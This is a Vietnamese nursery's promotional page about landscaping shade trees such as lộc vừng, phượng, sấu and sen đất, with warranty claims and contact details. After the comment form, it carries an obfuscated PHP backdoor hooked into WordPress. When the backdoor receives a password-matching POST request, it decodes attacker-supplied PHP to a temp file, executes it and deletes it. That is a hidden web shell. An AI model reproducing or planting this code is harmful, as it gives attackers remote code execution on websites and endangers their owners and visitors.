Trồng cây xanh công trình nào là phù hợp vào năm 2021

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Bạn đang có nhu cầu trồng cây xanh công trình cho nhà bạn để tăng thêm cảnh quan cho ngôi nhà, bạn đang có nhu cầu trồng thêm cây xanh tạo bóng mát cho ngôi nhà của bạn vào những ngày nắng nóng oi ả, bạn đang phân vân không biết nên chọn cây nào để tăng cảnh quan cho ngôi nhà của bạn? vậy hãy để Vuoncayhoabinh.com giới thiệu những giống cây mà chúng tôi đang cung cấp  chọn các loại cây xanh công trình phù hợp với cảnh quan gia đình bạn, mời các bạn theo dõi bài viết dưới đây.

Cung cấp cây xanh công trình toàn quốc Vườn Cây Hòa bình
Cung cấp cây xanh công trình toàn quốc Vườn Cây Hòa bình

>>>>>>Xem thêm: Cây công trình tại Vườn Cây Hòa Bình

Cây lộc vừng

Nói đến cây lộc vừng là một trong 4 cây cảnh quý hiện nay bao gồm: sanh; sung; lộc; vừng. Đây là một dòng cây cảnh được rất nhiều người ưa thích, đây là giống cây sống chủ yếu ở nam á và bắc úc.

Đặc điểm dòng cây này cây này có tán lá rộng và đẹp, đặc biệt hoa của cây này rất đẹp khi ra hoa cây sẽ tạo thành những dải hoa màu đỏ đẹp trông như treo câu đối may mắn trong nhà vậy, loai hoa của cây này cũng có hình ảnh tượng trưng cho sự may mắn. từ cái tên của nó cũng có ngụ ý là phát lộc tài lộc mang đến nhà.

Cây này phù hợp với những gia chủ có hệ thống sân vườn rộng có thể trồng làm cảnh hoặc lề đường đủ lớn, trồng cây lộng vừng vừa có thể tạo được bóng mát vừa có thể tăng thêm cảnh quan cho ngôi nhà đặc biệt vào các dịp từ tháng 6 đến tháng 9 khi từng  dải hoa dải xuống sẽ tạo một màu đỏ rất quyến rũ và may mắn.

Cung cấp cây xanh công trình toàn quốc Vườn Cây Hòa bình
Cung cấp cây xanh công trình toàn quốc Vườn Cây Hòa bình

>>>Xem thêm: Cây lộc vừng trồng công trình tại Vườn cây Hòa Bình

Cây me chua công trình

Đây là một cây gỗ lớn, có thể cao đến 20m là giống cây thường xanh ít rụng lá,sống trong vùng khí hậu nhiệt đới, với chiều cao và tán lá rộng thì đây là một giống cây thích hợp để trồng ngoài cửa nhà. 

Cây me chua này ưa với điều kiện nhiệt độ nhiệt đới rất nhạy cảm với sương giá, loại cây này có lá kép giống với lông chim mọc đối xứng hai bên, có hoa màu vàng tươi, có quả giống hạt đậu  khi còn xanh thì ăn rất chua ít được mang về ăn trực tiếp mà mang làm gia vị cho các món ăn, khi quả chín thì bắt đầu có vị ngọt. Đây cũng là cây thường được trồng ven phố, rất thích hợp để trồng lấy bóng mát và còn có giá trị làm thực phẩm.

 

>>>Xem thêm: cây me chua công trình tại Vườn Cây Hòa Bình

Cây phượng công trình:

Có nguồn gốc từ madagascar được nhiều nước nhập về, đây là một giống cây nhiệt đới, trong điều kiện tự nhiên hoang dã thì đang nằm trong tình trạng nguy cấp. Ngoài giá trị là cây cảnh thì nó còn có tác dụng là cho bóng dâm nhờ cây có tán rộng và chia nhiều cành, cây có thể đạt được chiều cao lên đến 20m chiều cao trung bình của cây đạt từ 10-12m, đây là cây gắn liền với lứa tuổi học sinh, màu đỏ của hoa phượng nở thì sẽ báo hiệu hè về vào dịp từ tháng 5 cho đến tháng 6, đây là cây phát tán nhanh.

Cây phượng công trình có thể phát triển tốt trên mọi loại địa hình như ven biển; đồi núi; trung du và đồng bằng. Đây là cây ưa sáng thích hợp với rất nhiều loại đất khác nhau và phát triển rất nhanh. nhược điểm lớn nhất của dòng cây này là tuổi thọ không cao.

Cung cấp cây xanh công trình toàn quốc Vườn Cây Hòa bình
Cung cấp cây xanh công trình toàn quốc Vườn Cây Hòa bình

>>>Xem thêm: cây phượng công trình tại Vườn Cây Hòa Bình

Cây sấu công trình 

Đặc điểm của cây sấu là một loại cây gỗ lớn , chúng sống rất lâu năm cây có chiều cao trung bình từ 15-25m. khi trưởng thành tối đa kích thước của cây có thể đạt được đường kính lên đến 80-100cm, loài cây này thường ra hoa vào tháng 5-6, có quả chua thường được làm gia vị cho bữa ăn hoặc ngâm siro để uống giải khát vào mùa hè.

vuon-cay-hoa-binh-cay-cong-trinh-cay-bong-mat
Cung cấp cây xanh công trình toàn quốc Vườn Cây Hòa bình

>>>Xem thêm: Cây sấu Công trình  tại Vườn ươm Hòa bình

Cây sen đất cây công trình

Cây sen đất là một cây ưa ánh sáng, là dòng cây thường xanh ít rụng lá, vậy nên khi chọn cây này nên đưa vào các vị trí nhiều ánh sáng tại khu vực sân vườn hoặc trước cổng nhà nhiều ánh sáng, đây là cây thân gỗ dáng cây mọc thẳng có tán rộng làm bỏng mát những ngày nắng loại cây này có hoa lớn mỗi bông có 9 cánh xếp thành ba tầng xen kẽ nhau giống hoa sen nên loại cây này có tên gọi là sen đất. 

Loài cây này sống được nhiều điều kiện khí hậu khác nhau, thích nghi với nhiều loại đất, giống cây này có khả năng sinh trưởng và phát triển nhanh đặc biệt khi mua cây công trình thì chỉ trong một năm là tán cây đã có khả năng phát triển rộng và tạo bóng mát rồi.

Ngoài việc bán những cây trên thì chúng tôi còn cung cấp các loại cây công trình khác như: cây ăn quả công trình; Cây đào tiên công trình; Cây bàng; Cây phi lao; Cây xoài công trình;… Và còn rất nhiều loại cây khác nữa các bác có thể tham khảo dưới đây.

Cung cấp cây xanh công trình toàn quốc Vườn Cây Hòa bình
Cung cấp cây xanh công trình toàn quốc Vườn Cây Hòa bình

>>>Xem thêm: Cây sen đất công trình tại Vườn Cây Hòa Bình 

Vườn Cây Hoa Bình Nơi cung cấp cây công trình uy tín

Với hơn 20 năm kinh nghiêm trong lĩnh vực chăm sóc cây trồng, và lai tạo giống cây trồng, với hệ thống vườn ươm rống lớn, nhiều chủng loại cây dịch vụ  cây công trình chuyên nghiệp chúng tôi cam kết mang đến sản phẩm và dịch vụ tốt nhất cho quý khách. 

Với dịch vụ bảo hành lên đến từ 3-6 tháng tùy từng loại cây công trình tôi đem niềm tin và an tâm đến khách hàng, cùng với đội ngũ kỹ sư dày dặn kinh nghiệm trong lĩnh vực cây trồng chúng tôi có thể hỗ trợ tư vấn mọi vấn đề về cây trồng mà quý khách gặp phải. Ngoài ra hệ thống vườn ươm lớn nên giúp chung tôi tối ưu được giá thành mang những sản phẩm với giá thành thấp đến cho khách hàng.

Nếu các bác có nhu cầu hoặc còn thắc mắc gì về sản phẩm vui lòng liên hệ theo thông tin dưới đây:

>>>Tìm hiểu thêm thông tin của Vườn Cây Hòa Bình

LIÊN HỆ

– Hotline: 0962.376.560

Bán hàng: 0962.376.560

Nguyễn Trường Giang

Địa chỉ: Tổ dân phố hoà bình 2, Biên giang , Hà Đông ,Hà Nội

 

 

 

 

 

.

 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}